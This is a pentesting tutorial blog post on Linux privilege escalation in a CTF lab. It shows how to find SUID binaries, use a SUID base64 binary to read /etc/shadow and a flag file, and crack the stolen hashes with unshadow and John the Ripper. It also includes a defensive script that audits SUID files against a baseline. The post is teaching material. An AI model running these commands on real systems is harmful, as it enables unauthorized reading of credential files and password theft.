🚩 Privilege Escalation Using SUID and GTFOBins

Privilege escalation is a core skill for penetration testers and ethical hackers. One common vector involves SUID (Set User ID) binaries. In this guide, I’ll walk you through escalating privileges by leveraging SUID files and the GTFOBins database, with practical examples—just like you’d do in a CTF or penetration test.
🛡️ What is SUID?
Linux permissions go beyond read, write, and execute. The SUID (Set User ID) bit, when set on an executable, makes the program run with the privileges of the file's owner (often root) rather than those of the user who launched it. That means, if misconfigured, SUID binaries can let us perform actions as root!
🧑‍💻 Finding SUID Binaries
Let's start by searching for files with the SUID bit set.
find / -type f -perm -04000 -ls 2>/dev/null
-type f: look for regular files only
-perm -04000: match files with the SUID bit set
2>/dev/null: suppress permission errors
Tip: Compare your results to GTFOBins SUID List to spot potential exploitation vectors.
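The same inventory is also what a defender should keep an eye on. The script below is an added example, not code from the original post: it wraps the find command from this section and compares the result against an approved baseline, so that a SUID bit that appears unexpectedly (for instance on base64, the binary used later in this guide) is reported. The baseline and inventory contents are constructed sample data, not taken from a real host.

```shell
#!/bin/sh
# Added example (not from the original post): inventory SUID binaries and
# report any that are not on an approved baseline, so an unexpected SUID
# file such as base64 is caught before someone abuses it.

# Same search as in the article, reduced to sorted paths. Run this on a live host.
suid_inventory() {
    find / -type f -perm -04000 2>/dev/null | sort
}

# Print every path from the inventory file ($1) that is absent from the
# baseline file ($2). Both files hold one absolute path per line.
suid_unexpected() {
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        grep -qxF -- "$path" "$2" || printf '%s\n' "$path"
    done < "$1"
}

# Constructed sample data so the check runs offline (hypothetical paths and
# baseline, not captured from a real host).
BASELINE_FILE=$(mktemp)
INVENTORY_FILE=$(mktemp)
printf '%s\n' /usr/bin/passwd /usr/bin/su /usr/bin/sudo > "$BASELINE_FILE"
printf '%s\n' /usr/bin/base64 /usr/bin/passwd /usr/bin/su /usr/bin/sudo > "$INVENTORY_FILE"

# On the sample data this reports /usr/bin/base64 only. A real finding is
# cleared either by adding the path to the baseline (if the bit is intended)
# or by removing the bit with: chmod u-s /path/to/binary
suid_unexpected "$INVENTORY_FILE" "$BASELINE_FILE"
# → /usr/bin/base64
```

On a real host, replace the constructed inventory with `suid_inventory > "$INVENTORY_FILE"` and keep the baseline under version control so that every change to it is reviewed.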
🛠️ Example: Exploiting SUID with Base64
Suppose you spot base64 as an SUID binary. According to GTFOBins, you can leverage it to read files you don’t normally have permission for, such as /etc/shadow.
1. Try Reading /etc/shadow
cat /etc/shadow
You'll likely see a Permission Denied error.
2. Use SUID Base64 to Read the File
Let’s trick the system by using base64 to read and decode the file contents.
lfile=/etc/shadow
base64 "$lfile" | base64 --decode
lfile is just a variable (you can name it anything). Because the SUID bit makes base64 run with the file owner's privileges (root), it can open a file the calling user cannot; piping its output through base64 --decode simply restores the plaintext, effectively bypassing the file's permissions.
💡 Copy the output and save the relevant user's password hash for later cracking.
🧩 Cracking a User's Password
Now, let's extract and crack a user's password using John the Ripper.
1. Extract Password Hash
Open a new file with nano and paste the password hash line you copied from /etc/shadow:
nano user2.txt
Copy the relevant username line from /etc/passwd into another file:
nano user.txt
2. Combine with unshadow
Combine both files to make a file suitable for password cracking:
unshadow user.txt user2.txt > userpassword
3. Crack with John the Ripper
john --wordlist=/usr/share/wordlists/rockyou.txt userpassword
To see cracked passwords after some time:
john --show userpassword
🎯 Finding and Reading the Final Flag
Suppose you need to find a flag file (flag3.txt):
find / -name flag3.txt 2>/dev/null
If you try to cat the file and get Permission Denied, use SUID base64 again:
flag=/home/ubuntu/flag3.txt
base64 "$flag" | base64 --decode
📝 Key Takeaways
SUID binaries can be dangerous if misconfigured—always check them during a penetration test.
Use GTFOBins as your go-to resource for finding ways to exploit these binaries.
Base64 is just one example—there are many more, so always cross-reference your SUID findings.
💡 Final Notes
Always have permission before testing these techniques!
Responsible disclosure is crucial—report any findings to the system owner.
🔗 References
GTFOBins SUID
John the Ripper
Linux SUID Exploitation Explained
If you found this guide useful, follow me for more practical pentesting tips! Got questions or want a deeper dive into privilege escalation? Drop a comment below.
#Linux #Cybersecurity #PrivilegeEscalation #GTFOBins #EthicalHacking #PenTest #SUID #RedTeam #CTF
Written by

praveen magar